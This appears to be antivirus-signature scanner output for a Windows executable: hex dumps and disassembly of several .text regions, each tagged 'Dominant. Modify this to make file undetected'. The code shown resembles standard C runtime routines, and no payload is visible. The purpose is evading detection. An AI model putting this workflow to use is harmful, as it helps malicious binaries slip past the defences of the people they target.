0000A1B0   E8 CC FE FF FF 83 7F 0C 00 59 75 E2 81 FF 38 A1    .........Yu...8.
0000A1C0   41 00 74 DA 57 E8 EC FC FF FF 59 EB D1 33 C0 5F    A.t.W.....Y..3._
0000A1D0   5E 5D C3 8B FF 55 8B EC 56 8B 75 0C 85 F6 74 1B    ^]...U..V.u...t.
0000A1E0   6A E0 33 D2 58 F7 F6 3B 45 10 73 0F E8 BA BD FF    j.3.X..;E.s.....
0000A1F0   FF C7 00 0C 00 00 00 33 C0 EB 42 53 8B 5D 08 57    .......3..BS.].W
0000A200   85 DB 74 0B 53 E8 C4 41 00 00 59 8B F8 EB 02 33    ..t.S..A..Y....3
0000A210   FF 0F AF 75 10 56 53 E8 E5 41 00 00 8B D8 59 59    ...u.VS..A....YY
0000A220   85 DB 74 15 3B FE 73 11 2B F7 8D 04 3B 56 6A 00    ..t.;.s.+...;Vj.
0000A230   50 E8 DA 76 FF FF 83 C4 0C 5F 8B C3 5B 5E 5D C3    P..v....._..[^].
0000A240   FF 15 E8 20 41 00 85 C0 A3 B0 B3 41 00 0F 95 C0    ... A......A....
0000A250   C3 83 25 B0 B3 41 00 00 B0 01 C3 8B FF 55 8B EC    ..%..A.......U..
0000A260   53 56 57 8B 7D 08 3B 7D 0C 74 51 8B F7 8B 1E 85    SVW.}.;}.tQ.....
0000A270   DB 74 0E 8B CB FF 15 20 21 41 00 FF D3 84 C0 74    .t..... !A.....t
0000A280   08 83 C6 08 3B 75 0C 75 E4 3B 75 0C 74 2E 3B F7    ....;u.u.;u.t.;.
0000A290   74 26 83 C6 FC 83 7E FC 00 74 13 8B 1E 85 DB 74    t&....~..t.....t
0000A2A0   0D 6A 00 8B CB FF 15 20 21 41 00 FF D3 59 83 EE    .j..... !A...Y..
0000A2B0   08 8D 46 04 3B C7 75 DD 32 C0 EB 02 B0 01 5F 5E    ..F.;.u.2....._^
0000A2C0   5B 5D C3 8B FF 55 8B EC 56 8B 75 0C 39 75 08 74    []...U..V.u.9u.t
0000A2D0   1E 57 8B 7E FC 85 FF 74 0D 6A 00 8B CF FF 15 20    .W.~...t.j..... 
0000A2E0   21 41 00 FF D7 59 83 EE 08 3B 75 08 75 E4 5F B0    !A...Y...;u.u._.
0000A2F0   01 5E 5D C3 8B FF 55 8B EC 8B 45 08 A3 B4 B3 41    .^]...U...E....A
0000A300   00 5D C3 8B FF 55 8B EC 56 E8 22 00 00 00 8B F0    .]...U..V.".....
0000A310   85 F6 74 17 FF 75 08 8B CE FF 15 20 21 41 00 FF    ..t..u..... !A..
0000A320   D6 59 85 C0 74 05 33 C0 40 EB 02 33 C0 5E 5D C3    .Y..t.3.@..3.^].
0000A330   6A 0C 68 C8 91 41 00 E8 B4 70 FF FF 83 65 E4 00    j.h..A...p...e..
0000A340   6A 00 E8 A5 F3 FF FF 59 83 65 FC 00 8B 35 04 A0    j......Y.e...5..
0000A350   41 00 8B CE 83 E1 1F 33 35 B4 B3 41 00 D3 CE 89    A......35..A....

Match 59: 42096 (size: 272)

Dominant. Modify this to make file undetected

.text

0000A470   F8 50 8D 45 FF 50 8D 45 F4 50 E8 0D FF FF FF C9    .P.E.P.E.P......
0000A480   C3 8B FF 55 8B EC 8B 45 08 A3 B8 B3 41 00 A3 BC    ...U...E....A...
0000A490   B3 41 00 A3 C0 B3 41 00 A3 C4 B3 41 00 5D C3 6A    .A....A....A.].j
0000A4A0   24 68 E8 91 41 00 E8 45 6F FF FF 83 65 E0 00 83    $h..A..Eo...e...
0000A4B0   65 D0 00 B1 01 88 4D E7 8B 75 08 6A 08 5B 3B F3    e.....M..u.j.[;.
0000A4C0   7F 18 74 37 8D 46 FF 83 E8 01 74 22 48 83 E8 01    ..t7.F....t"H...
0000A4D0   74 29 48 83 E8 01 75 47 EB 14 83 FE 0B 74 1C 83    t)H...uG.....t..
0000A4E0   FE 0F 74 0A 83 FE 14 7E 36 83 FE 16 7F 31 56 E8    ..t....~6....1V.
0000A4F0   FC FE FF FF 83 C4 04 8B F8 EB 3E E8 E3 CE FF FF    ..........>.....
0000A500   8B F8 89 7D E0 85 FF 75 08 83 C8 FF E9 5D 01 00    ...}...u.....]..
0000A510   00 FF 37 56 E8 19 FF FF FF 59 59 85 C0 75 12 E8    ..7V.....YY..u..
0000A520   87 BA FF FF C7 00 16 00 00 00 E8 BF B9 FF FF EB    ................
0000A530   D8 8D 78 08 32 C9 88 4D E7 89 7D DC 83 65 D4 00    ..x.2..M..}..e..
0000A540   84 C9 74 0B 6A 03 E8 A1 F1 FF FF 59 8A 4D E7 83    ..t.j......Y.M..
0000A550   65 D8 00 C6 45 E6 00 83 65 FC 00 8B 3F 84 C9 74    e...E...e...?..t
0000A560   14 8B 0D 04 A0 41 00 83 E1 1F 33 3D 04 A0 41 00    .....A....3=..A.
0000A570   D3 CF 8A 4D E7 89 7D D8 83 FF 01 0F 94 C0 88 45    ...M..}........E

0xa462: 0x0040b062 6a03 push 3 ; 3
0xa464: 0x0040b064 58 pop eax
0xa465: 0x0040b065 8945f8 mov dword [var_8h], eax
0xa468: 0x0040b068 8d4dff lea ecx, [var_1h]
0xa46b: 0x0040b06b 8945f4 mov dword [var_ch], eax
0xa46e: 0x0040b06e 8d45f8 lea eax, [var_8h]
0xa471: 0x0040b071 50 push eax
0xa472: 0x0040b072 8d45ff lea eax, [var_1h]
0xa475: 0x0040b075 50 push eax
0xa476: 0x0040b076 8d45f4 lea eax, [var_ch]
0xa479: 0x0040b079 50 push eax ; int32_t arg_8h
0xa47a: 0x0040b07a e80dffffff call fcn.0040af8c
0xa47f: 0x0040b07f c9 leave
0xa480: 0x0040b080 c3 ret
0xa481: ; CALL XREF from fcn.00405f75 @ +0x78(x)
0xa481: 30: fcn.0040b081 (int32_t arg_8h);
0xa481: ; arg int32_t arg_8h @ ebp+0x8
0xa481: 0x0040b081 8bff mov edi, edi
0xa483: 0x0040b083 55 push ebp
0xa484: 0x0040b084 8bec mov ebp, esp
0xa486: 0x0040b086 8b4508 mov eax, dword [arg_8h]
0xa489: 0x0040b089 a3b8b34100 mov dword [0x41b3b8], eax ; [0x41b3b8:4]=0
0xa48e: 0x0040b08e a3bcb34100 mov dword [0x41b3bc], eax ; [0x41b3bc:4]=0
0xa493: 0x0040b093 a3c0b34100 mov dword [0x41b3c0], eax ; [0x41b3c0:4]=0
0xa498: 0x0040b098 a3c4b34100 mov dword [0x41b3c4], eax ; [0x41b3c4:4]=0
0xa49d: 0x0040b09d 5d pop ebp
0xa49e: 0x0040b09e c3 ret
0xa49f: ; CALL XREF from fcn.004061da @ 0x4061e5(x)
0xa49f: 475: fcn.0040b09f (int32_t arg_8h);
0xa49f: ; arg int32_t arg_8h @ ebp+0x8
0xa49f: ; var int32_t var_4h @ ebp-0x4
0xa49f: ; var int32_t var_10h @ ebp-0x10
0xa49f: ; var int32_t var_19h @ ebp-0x19
0xa49f: ; var uint32_t var_1ah @ ebp-0x1a
0xa49f: ; var int32_t var_20h @ ebp-0x20
0xa49f: ; var int32_t var_24h @ ebp-0x24
0xa49f: ; var int32_t var_28h @ ebp-0x28
0xa49f: ; var int32_t var_2ch @ ebp-0x2c
0xa49f: ; var int32_t var_30h @ ebp-0x30
0xa49f: ; var int32_t var_34h @ ebp-0x34
0xa49f: 0x0040b09f 6a24 push 0x24 ; '$' ; 36
0xa4a1: 0x0040b0a1 68e8914100 push 0x4191e8
0xa4a6: 0x0040b0a6 e8456fffff call fcn.00401ff0
0xa4ab: 0x0040b0ab 8365e000 and dword [var_20h], 0
0xa4af: 0x0040b0af 8365d000 and dword [var_30h], 0
0xa4b3: 0x0040b0b3 b101 mov cl, 1
0xa4b5: 0x0040b0b5 884de7 mov byte [var_19h], cl
0xa4b8: 0x0040b0b8 8b7508 mov esi, dword [arg_8h]
0xa4bb: 0x0040b0bb 6a08 push 8 ; 8
0xa4bd: 0x0040b0bd 5b pop ebx
0xa4be: 0x0040b0be 3bf3 cmp esi, ebx
0xa4c0: < 0x0040b0c0 7f18 jg 0x40b0da
0xa4c2: < 0x0040b0c2 7437 je 0x40b0fb
0xa4c4: 0x0040b0c4 8d46ff lea eax, [esi - 1]
0xa4c7: 0x0040b0c7 83e801 sub eax, 1
0xa4ca: < 0x0040b0ca 7422 je 0x40b0ee
0xa4cc: 0x0040b0cc 48 dec eax
0xa4cd: 0x0040b0cd 83e801 sub eax, 1
0xa4d0: < 0x0040b0d0 7429 je 0x40b0fb
0xa4d2: 0x0040b0d2 48 dec eax
0xa4d3: 0x0040b0d3 83e801 sub eax, 1
0xa4d6: < 0x0040b0d6 7547 jne 0x40b11f
0xa4d8: < 0x0040b0d8 eb14 jmp 0x40b0ee
0xa4da: ; CODE XREF from fcn.0040b09f @ 0x40b0c0(x)
0xa4da: > 0x0040b0da 83fe0b cmp esi, 0xb ; 11
0xa4dd: < 0x0040b0dd 741c je 0x40b0fb
0xa4df: 0x0040b0df 83fe0f cmp esi, 0xf ; 15
0xa4e2: < 0x0040b0e2 740a je 0x40b0ee
0xa4e4: 0x0040b0e4 83fe14 cmp esi, 0x14 ; 20
0xa4e7: < 0x0040b0e7 7e36 jle 0x40b11f
0xa4e9: 0x0040b0e9 83fe16 cmp esi, 0x16 ; 22
0xa4ec: < 0x0040b0ec 7f31 jg 0x40b11f
0xa4ee: ; CODE XREFS from fcn.0040b09f @ 0x40b0ca(x), 0x40b0d8(x), 0x40b0e2(x)
0xa4ee: > 0x0040b0ee 56 push esi ; int32_t arg_8h
0xa4ef: 0x0040b0ef e8fcfeffff call fcn.0040aff0
0xa4f4: 0x0040b0f4 83c404 add esp, 4
0xa4f7: 0x0040b0f7 8bf8 mov edi, eax
0xa4f9: < 0x0040b0f9 eb3e jmp 0x40b139
0xa4fb: ; CODE XREFS from fcn.0040b09f @ 0x40b0c2(x), 0x40b0d0(x), 0x40b0dd(x)
0xa4fb: > 0x0040b0fb e8e3ceffff call fcn.00407fe3
0xa500: 0x0040b100 8bf8 mov edi, eax
0xa502: 0x0040b102 897de0 mov dword [var_20h], edi
0xa505: 0x0040b105 85ff test edi, edi
0xa507: < 0x0040b107 7508 jne 0x40b111
0xa509: ; CODE XREF from fcn.0040b09f @ 0x40b12f(x)
0xa509: > 0x0040b109 83c8ff or eax, 0xffffffff ; -1
0xa50c: < 0x0040b10c e95d010000 jmp 0x40b26e
0xa511: ; CODE XREF from fcn.0040b09f @ 0x40b107(x)
0xa511: > 0x0040b111 ff37 push dword [edi] ; int32_t arg_ch
0xa513: 0x0040b113 56 push esi ; int32_t arg_8h
0xa514: 0x0040b114 e819ffffff call fcn.0040b032
0xa519: 0x0040b119 59 pop ecx
0xa51a: 0x0040b11a 59 pop ecx
0xa51b: 0x0040b11b 85c0 test eax, eax
0xa51d: < 0x0040b11d 7512 jne 0x40b131
0xa51f: ; CODE XREFS from fcn.0040b09f @ 0x40b0d6(x), 0x40b0e7(x), 0x40b0ec(x)
0xa51f: > 0x0040b11f e887baffff call fcn.00406bab
0xa524: 0x0040b124 c70016000000 mov dword [eax], 0x16 ; [0x16:4]=-1 ; 22
0xa52a: 0x0040b12a e8bfb9ffff call fcn.00406aee
0xa52f: < 0x0040b12f ebd8 jmp 0x40b109
0xa531: ; CODE XREF from fcn.0040b09f @ 0x40b11d(x)
0xa531: > 0x0040b131 8d7808 lea edi, [eax + 8]
0xa534: 0x0040b134 32c9 xor cl, cl
0xa536: 0x0040b136 884de7 mov byte [var_19h], cl
0xa539: ; CODE XREF from fcn.0040b09f @ 0x40b0f9(x)
0xa539: > 0x0040b139 897ddc mov dword [var_24h], edi
0xa53c: 0x0040b13c 8365d400 and dword [var_2ch], 0
0xa540: 0x0040b140 84c9 test cl, cl
0xa542: < 0x0040b142 740b je 0x40b14f
0xa544: 0x0040b144 6a03 push 3 ; 3
0xa546: 0x0040b146 e8a1f1ffff call fcn.0040a2ec
0xa54b: 0x0040b14b 59 pop ecx
0xa54c: 0x0040b14c 8a4de7 mov cl, byte [var_19h]
0xa54f: ; CODE XREF from fcn.0040b09f @ 0x40b142(x)
0xa54f: > 0x0040b14f 8365d800 and dword [var_28h], 0
0xa553: 0x0040b153 c645e600 mov byte [var_1ah], 0
0xa557: 0x0040b157 8365fc00 and dword [var_4h], 0
0xa55b: 0x0040b15b 8b3f mov edi, dword [edi]
0xa55d: 0x0040b15d 84c9 test cl, cl
0xa55f: < 0x0040b15f 7414 je 0x40b175
0xa561: 0x0040b161 8b0d04a04100 mov ecx, dword [0x41a004] ; [0x41a004:4]=0xbb40e64e
0xa567: 0x0040b167 83e11f and ecx, 0x1f ; 31
0xa56a: 0x0040b16a 333d04a04100 xor edi, dword [0x41a004] ; [0x41a004:4]=0xbb40e64e
0xa570: 0x0040b170 d3cf ror edi, cl
0xa572: 0x0040b172 8a4de7 mov cl, byte [var_19h]
0xa575: ; CODE XREF from fcn.0040b09f @ 0x40b15f(x)
0xa575: > 0x0040b175 897dd8 mov dword [var_28h], edi
0xa578: 0x0040b178 83ff01 cmp edi, 1 ; 1
0xa57b: 0x0040b17b 0f94c0 sete al
0xa57e: 0x0040b17e 8845e6 mov byte [var_1ah], al
0xa581: 0x0040b181 84c0 test al, al
0xa583: < 0x0040b183 7571 jne 0x40b1f6
0xa585: 0x0040b185 85ff test edi, edi
0xa587: < 0x0040b187 0f84f1000000 je 0x40b27e
0xa58d: 0x0040b18d 3bf3 cmp esi, ebx
0xa58f: 0x0040b18f 74 invalid

Match 60: 42912 (size: 1088)

Dominant. Modify this to make file undetected

.text

0000A7A0   55 F4 8B 45 F8 A8 3F 74 28 8B C8 23 CE C1 E1 04    U..E..?t(..#....
0000A7B0   A8 04 74 03 83 C9 08 A8 08 74 03 83 C9 04 A8 10    ..t......t......
0000A7C0   74 03 83 C9 02 A8 20 74 02 0B CE A8 02 74 02 0B    t..... t.....t..
0000A7D0   CF 0B CA 8B C1 5F EB 3C 66 8B 4D FC 33 C0 F6 C1    ....._.<f.M.3...
0000A7E0   3F 74 31 0F B7 C1 23 C6 C1 E0 04 F6 C1 04 74 03    ?t1...#.......t.
0000A7F0   83 C8 08 F6 C1 08 74 03 83 C8 04 F6 C1 10 74 03    ......t.......t.
0000A800   83 C8 02 F6 C1 20 74 02 0B C6 F6 C1 02 74 05 0D    ..... t......t..
0000A810   00 00 08 00 5E C9 C3 8B FF 55 8B EC 83 EC 10 9B    ....^....U......
0000A820   D9 7D F8 66 8B 45 F8 0F B7 C8 83 E1 01 C1 E1 04    .}.f.E..........
0000A830   A8 04 74 03 83 C9 08 A8 08 74 03 83 C9 04 A8 10    ..t......t......
0000A840   74 03 83 C9 02 A8 20 74 03 83 C9 01 A8 02 74 06    t..... t......t.
0000A850   81 C9 00 00 08 00 53 56 0F B7 F0 BB 00 0C 00 00    ......SV........
0000A860   8B D6 57 BF 00 02 00 00 23 D3 74 26 81 FA 00 04    ..W.....#.t&....
0000A870   00 00 74 18 81 FA 00 08 00 00 74 0C 3B D3 75 12    ..t.......t.;.u.
0000A880   81 C9 00 03 00 00 EB 0A 0B CF EB 06 81 C9 00 01    ................
0000A890   00 00 81 E6 00 03 00 00 74 0C 3B F7 75 0E 81 C9    ........t.;.u...
0000A8A0   00 00 01 00 EB 06 81 C9 00 00 02 00 0F B7 C0 BA    ................
0000A8B0   00 10 00 00 85 C2 74 06 81 C9 00 00 04 00 8B 7D    ......t........}
0000A8C0   0C 8B F7 8B 45 08 F7 D6 23 F1 23 C7 0B F0 3B F1    ....E...#.#...;.
0000A8D0   0F 84 A8 00 00 00 56 E8 3C 02 00 00 59 66 89 45    ......V.<...Yf.E
0000A8E0   FC D9 6D FC 9B D9 7D FC 66 8B 45 FC 0F B7 F0 83    ..m...}.f.E.....
0000A8F0   E6 01 C1 E6 04 A8 04 74 03 83 CE 08 A8 08 74 03    .......t......t.
0000A900   83 CE 04 A8 10 74 03 83 CE 02 A8 20 74 03 83 CE    .....t..... t...
0000A910   01 A8 02 74 06 81 CE 00 00 08 00 0F B7 D0 8B CA    ...t............
0000A920   23 CB 74 2A 81 F9 00 04 00 00 74 1C 81 F9 00 08    #.t*......t.....
0000A930   00 00 74 0C 3B CB 75 16 81 CE 00 03 00 00 EB 0E    ..t.;.u.........
0000A940   81 CE 00 02 00 00 EB 06 81 CE 00 01 00 00 81 E2    ................
0000A950   00 03 00 00 74 10 81 FA 00 02 00 00 75 0E 81 CE    ....t.......u...
0000A960   00 00 01 00 EB 06 81 CE 00 00 02 00 0F B7 C0 BA    ................
0000A970   00 10 00 00 85 C2 74 06 81 CE 00 00 04 00 83 3D    ......t........=
0000A980   18 AC 41 00 01 0F 8C 86 01 00 00 81 E7 1F 03 08    ..A.............
0000A990   03 0F AE 5D F0 8B 4D F0 8B C1 C1 E8 03 83 E0 10    ...]..M.........
0000A9A0   F7 C1 00 02 00 00 74 03 83 C8 08 F7 C1 00 04 00    ......t.........
0000A9B0   00 74 03 83 C8 04 F7 C1 00 08 00 00 74 03 83 C8    .t..........t...
0000A9C0   02 85 CA 74 03 83 C8 01 F7 C1 00 01 00 00 74 05    ...t..........t.
0000A9D0   0D 00 00 08 00 8B D1 BB 00 60 00 00 23 D3 74 27    .........`..#.t'
0000A9E0   81 FA 00 20 00 00 74 1A 81 FA 00 40 00 00 74 0B    ... ..t....@..t.
0000A9F0   3B D3 75 13 0D 00 03 00 00 EB 0C 0D 00 02 00 00    ;.u.............
0000AA00   EB 05 0D 00 01 00 00 6A 40 81 E1 40 80 00 00 5B    .......j@..@...[
0000AA10   2B CB 74 1A 81 E9 C0 7F 00 00 74 0B 2B CB 75 13    +.t.......t.+.u.
0000AA20   0D 00 00 00 01 EB 0C 0D 00 00 00 03 EB 05 0D 00    ................
0000AA30   00 00 02 8B CF 23 7D 08 F7 D1 23 C8 0B CF 3B C8    .....#}...#...;.
0000AA40   0F 84 B4 00 00 00 51 E8 46 FC FF FF 50 89 45 F4    ......Q.F...P.E.
0000AA50   E8 15 3A 00 00 59 59 0F AE 5D F4 8B 4D F4 8B C1    ..:..YY..]..M...
0000AA60   C1 E8 03 83 E0 10 F7 C1 00 02 00 00 74 03 83 C8    ............t...
0000AA70   08 F7 C1 00 04 00 00 74 03 83 C8 04 F7 C1 00 08    .......t........
0000AA80   00 00 74 03 83 C8 02 F7 C1 00 10 00 00 74 03 83    ..t..........t..
0000AA90   C8 01 F7 C1 00 01 00 00 74 05 0D 00 00 08 00 8B    ........t.......
0000AAA0   D1 BF 00 60 00 00 23 D7 74 27 81 FA 00 20 00 00    ...`..#.t'... ..
0000AAB0   74 1A 81 FA 00 40 00 00 74 0B 3B D7 75 13 0D 00    t....@..t.;.u...
0000AAC0   03 00 00 EB 0C 0D 00 02 00 00 EB 05 0D 00 01 00    ................
0000AAD0   00 81 E1 40 80 00 00 2B CB 74 1A 81 E9 C0 7F 00    ...@...+.t......
0000AAE0   00 74 0B 2B CB 75 13 0D 00 00 00 01 EB 0C 0D 00    .t.+.u..........
0000AAF0   00 00 03 EB 05 0D 00 00 00 02 8B C8 33 C6 0B CE    ............3...
0000AB00   A9 1F 03 08 00 74 06 81 C9 00 00 00 80 8B C1 EB    .....t..........
0000AB10   02 8B C6 5F 5E 5B C9 C3 8B FF 55 8B EC 8B 4D 08    ..._^[....U...M.
0000AB20   8B D1 C1 EA 04 83 E2 01 8B C2 F6 C1 08 74 06 83    .............t..
0000AB30   CA 04 0F B7 C2 F6 C1 04 74 03 83 C8 08 F6 C1 02    ........t.......
0000AB40   74 03 83 C8 10 F6 C1 01 74 03 83 C8 20 F7 C1 00    t.......t... ...
0000AB50   00 08 00 74 03 83 C8 02 56 8B D1 BE 00 03 00 00    ...t....V.......
0000AB60   57 BF 00 02 00 00 23 D6 74 23 81 FA 00 01 00 00    W.....#.t#......
0000AB70   74 16 3B D7 74 0B 3B D6 75 13 0D 00 0C 00 00 EB    t.;.t.;.u.......
0000AB80   0C 0D 00 08 00 00 EB 05 0D 00 04 00 00 8B D1 81    ................
0000AB90   E2 00 00 03 00 74 0C 81 FA 00 00 01 00 75 06 0B    .....t.......u..
0000ABA0   C7 EB 02 0B C6 5F 5E F7 C1 00 00 04 00 74 05 0D    ....._^......t..
0000ABB0   00 10 00 00 5D C3 8B FF 55 8B EC 51 51 66 8B 45    ....]...U..QQf.E
0000ABC0   08 B9 FF FF 00 00 56 66 8B 75 0C 0F B7 D6 66 3B    ......Vf.u....f;
0000ABD0   C1 74 47 B9 00 01 00 00 66 3B C1 73 10 0F B7 C8    .tG.....f;.s....

Match 61: 54880 (size: 1360)

Dominant. Modify this to make file undetected

.text

0000D660   F8 1A 00 00 50 E8 D0 1A 00 00 59 C3 8B FF 55 8B    ....P.....Y...U.
0000D670   EC FF 75 0C E8 27 AB FF FF 8B 45 0C 59 8B 40 0C    ..u..'....E.Y.@.
0000D680   90 A8 06 75 1C E8 21 89 FF FF C7 00 09 00 00 00    ...u..!.........
0000D690   8B 45 0C 6A 10 59 83 C0 0C F0 09 08 83 C8 FF 5D    .E.j.Y.........]
0000D6A0   C3 8B 45 0C 8B 40 0C 90 C1 E8 0C A8 01 74 0D E8    ..E..@.......t..
0000D6B0   F7 88 FF FF C7 00 22 00 00 00 EB D4 8B 45 0C 8B    ......"......E..
0000D6C0   40 0C 90 A8 01 74 28 FF 75 0C E8 1B 03 00 00 59    @....t(.u......Y
0000D6D0   8B 4D 0C 83 61 08 00 84 C0 8B 45 0C 74 B5 8B 48    .M..a.....E.t..H
0000D6E0   04 89 08 8B 45 0C 6A FE 59 83 C0 0C F0 21 08 8B    ....E.j.Y....!..
0000D6F0   45 0C 6A 02 59 83 C0 0C F0 09 08 8B 45 0C 6A F7    E.j.Y.......E.j.
0000D700   59 83 C0 0C F0 21 08 8B 45 0C 83 60 08 00 8B 45    Y....!..E..`...E
0000D710   0C 8B 40 0C 90 A9 C0 04 00 00 75 16 FF 75 0C E8    ..@.......u..u..
0000D720   E1 AA FF FF 59 84 C0 75 09 FF 75 0C E8 C2 1C 00    ....Y..u..u.....
0000D730   00 59 53 FF 75 0C 8B 5D 08 53 E8 11 01 00 00 59    .YS.u..].S.....Y
0000D740   59 84 C0 75 11 8B 45 0C 6A 10 59 83 C0 0C F0 09    Y..u..E.j.Y.....
0000D750   08 83 C8 FF EB 03 0F B6 C3 5B 5D C3 8B FF 55 8B    .........[]...U.
0000D760   EC FF 75 0C E8 37 AA FF FF 8B 45 0C 59 8B 40 0C    ..u..7....E.Y.@.
0000D770   90 A8 06 75 1E E8 31 88 FF FF C7 00 09 00 00 00    ...u..1.........
0000D780   8B 45 0C 6A 10 59 83 C0 0C F0 09 08 B8 FF FF 00    .E.j.Y..........
0000D790   00 5D C3 8B 45 0C 8B 40 0C 90 C1 E8 0C A8 01 74    .]..E..@.......t
0000D7A0   0D E8 05 88 FF FF C7 00 22 00 00 00 EB D2 8B 45    ........"......E
0000D7B0   0C 8B 40 0C 90 A8 01 74 28 FF 75 0C E8 29 02 00    ..@....t(.u..)..
0000D7C0   00 59 8B 4D 0C 83 61 08 00 84 C0 8B 45 0C 74 B3    .Y.M..a.....E.t.
0000D7D0   8B 48 04 89 08 8B 45 0C 6A FE 59 83 C0 0C F0 21    .H....E.j.Y....!
0000D7E0   08 8B 45 0C 6A 02 59 83 C0 0C F0 09 08 8B 45 0C    ..E.j.Y.......E.
0000D7F0   6A F7 59 83 C0 0C F0 21 08 8B 45 0C 83 60 08 00    j.Y....!..E..`..
0000D800   8B 45 0C 8B 40 0C 90 A9 C0 04 00 00 75 16 FF 75    .E..@.......u..u
0000D810   0C E8 EF A9 FF FF 59 84 C0 75 09 FF 75 0C E8 D0    ......Y..u..u...
0000D820   1B 00 00 59 56 FF 75 0C 8B 75 08 56 E8 EB 00 00    ...YV.u..u.V....
0000D830   00 59 59 84 C0 75 13 8B 45 0C 6A 10 59 83 C0 0C    .YY..u..E.j.Y...
0000D840   F0 09 08 B8 FF FF 00 00 EB 03 0F B7 C6 5E 5D C3    .............^].
0000D850   8B FF 55 8B EC 56 57 FF 75 0C E8 41 A9 FF FF 59    ..U..VW.u..A...Y
0000D860   8B 4D 0C 8B D0 8B 49 0C 90 F6 C1 C0 0F 84 90 00    .M....I.........
0000D870   00 00 8B 4D 0C 33 FF 8B 41 04 8B 31 2B F0 40 89    ...M.3..A..1+.@.
0000D880   01 8B 45 0C 8B 48 18 49 89 48 08 85 F6 7E 24 8B    ..E..H.I.H...~$.
0000D890   45 0C 56 FF 70 04 52 E8 96 DD FF FF 83 C4 0C 8B    E.V.p.R.........
0000D8A0   F8 8B 45 0C 3B FE 8B 48 04 8A 45 08 88 01 0F 94    ..E.;..H..E.....
0000D8B0   C0 EB 65 83 FA FF 74 1B 83 FA FE 74 16 8B C2 8B    ..e...t....t....
0000D8C0   CA 83 E0 3F C1 F9 06 6B C0 38 03 04 8D 20 B0 41    ...?...k.8... .A
0000D8D0   00 EB 05 B8 F8 A0 41 00 F6 40 28 20 74 C3 6A 02    ......A..@( t.j.
0000D8E0   57 57 52 E8 37 10 00 00 23 C2 83 C4 10 83 F8 FF    WWR.7...#.......
0000D8F0   75 AF 8B 45 0C 6A 10 59 83 C0 0C F0 09 08 B0 01    u..E.j.Y........
0000D900   EB 16 6A 01 8D 45 08 50 52 E8 24 DD FF FF 83 C4    ..j..E.PR.$.....
0000D910   0C 48 F7 D8 1A C0 FE C0 5F 5E 5D C3 8B FF 55 8B    .H......_^]...U.
0000D920   EC 56 57 FF 75 0C E8 75 A8 FF FF 59 8B 4D 0C 8B    .VW.u..u...Y.M..
0000D930   D0 8B 49 0C 90 F6 C1 C0 0F 84 93 00 00 00 8B 4D    ..I............M
0000D940   0C 33 FF 8B 41 04 8B 31 2B F0 83 C0 02 89 01 8B    .3..A..1+.......
0000D950   45 0C 8B 48 18 83 E9 02 89 48 08 85 F6 7E 23 8B    E..H.....H...~#.
0000D960   45 0C 56 FF 70 04 52 E8 C6 DC FF FF 83 C4 0C 8B    E.V.p.R.........
0000D970   F8 8B 45 0C 3B FE 8B 48 04 66 8B 45 08 66 89 01    ..E.;..H.f.E.f..
0000D980   EB 61 83 FA FF 74 1B 83 FA FE 74 16 8B C2 8B CA    .a...t....t.....
0000D990   83 E0 3F C1 F9 06 6B C0 38 03 04 8D 20 B0 41 00    ..?...k.8... .A.
0000D9A0   EB 05 B8 F8 A0 41 00 F6 40 28 20 74 C4 6A 02 57    .....A..@( t.j.W
0000D9B0   57 52 E8 68 0F 00 00 23 C2 83 C4 10 83 F8 FF 75    WR.h...#.......u
0000D9C0   B0 8B 45 0C 6A 10 59 83 C0 0C F0 09 08 B0 01 EB    ..E.j.Y.........
0000D9D0   15 6A 02 8D 45 08 50 52 E8 55 DC FF FF 83 C4 0C    .j..E.PR.U......
0000D9E0   83 F8 02 0F 94 C0 5F 5E 5D C3 8B FF 55 8B EC 8B    ......_^]...U...
0000D9F0   45 08 83 EC 10 8B 40 0C 90 C1 E8 03 A8 01 74 04    E.....@.......t.
0000DA00   B0 01 C9 C3 8B 45 08 53 56 8B 40 0C 90 A8 C0 8B    .....E.SV.@.....
0000DA10   45 08 74 07 8B 08 3B 48 04 74 4E 8B 40 10 90 50    E.t...;H.tN.@..P
0000DA20   E8 7C BF FF FF 8B F0 59 83 FE FF 74 3C 33 DB 8D    .|.....Y...t<3..
0000DA30   45 F8 43 53 50 6A 00 6A 00 56 FF 15 FC 20 41 00    E.CSPj.j.V... A.
0000DA40   85 C0 74 25 8D 45 F0 50 56 FF 15 F8 20 41 00 85    ..t%.E.PV... A..
0000DA50   C0 74 16 8B 45 F8 3B 45 F0 75 08 8B 45 FC 3B 45    .t..E.;E.u..E.;E
0000DA60   F4 74 02 32 DB 8A C3 EB 02 32 C0 5E 5B C9 C3 8B    .t.2.....2.^[...
0000DA70   FF 55 8B EC 5D E9 F2 FB FF FF 8B FF 55 8B EC 5D    .U..].......U..]
0000DA80   E9 D7 FC FF FF 8B FF 55 8B EC 8B 4D 08 83 F9 FE    .......U...M....
0000DA90   75 0D E8 14 85 FF FF C7 00 09 00 00 00 EB 38 85    u.............8.
0000DAA0   C9 78 24 3B 0D 20 B2 41 00 73 1C 8B C1 83 E1 3F    .x$;. .A.s.....?
0000DAB0   C1 F8 06 6B C9 38 8B 04 85 20 B0 41 00 0F B6 44    ...k.8... .A...D
0000DAC0   08 28 83 E0 40 5D C3 E8 DF 84 FF FF C7 00 09 00    .(..@]..........
0000DAD0   00 00 E8 17 84 FF FF 33 C0 5D C3 CC CC CC CC CC    .......3.]......
0000DAE0   8B FF 55 8B EC 81 EC 18 01 00 00 A1 04 A0 41 00    ..U...........A.
0000DAF0   33 C5 89 45 FC 8B 4D 0C 53 8B 5D 14 56 8B 75 08    3..E..M.S.].V.u.
0000DB00   89 B5 FC FE FF FF 89 9D F8 FE FF FF 57 8B 7D 10    ............W.}.
0000DB10   89 BD 00 FF FF FF 85 F6 75 25 85 C9 74 21 E8 88    ........u%..t!..
0000DB20   84 FF FF C7 00 16 00 00 00 E8 C0 83 FF FF 8B 4D    ...............M
0000DB30   FC 5F 5E 33 CD 5B E8 9E 2F FF FF 8B E5 5D C3 85    ._^3.[../....]..
0000DB40   FF 74 DB 85 DB 74 D7 C7 85 E8 FE FF FF 00 00 00    .t...t..........
0000DB50   00 83 F9 02 72 D8 49 0F AF CF 03 CE 89 8D 08 FF    ....r.I.........
0000DB60   FF FF 8B C1 33 D2 2B C6 F7 F7 40 83 F8 08 0F 87    ....3.+...@.....
0000DB70   B6 00 00 00 3B CE 0F 86 27 04 00 00 8D 14 37 89    ....;...'.....7.
0000DB80   95 F0 FE FF FF 8B C6 8B F2 89 85 04 FF FF FF 3B    ...............;
0000DB90   F1 77 2F 50 56 8B CB FF 15 20 21 41 00 FF D3 83    .w/PV.... !A....
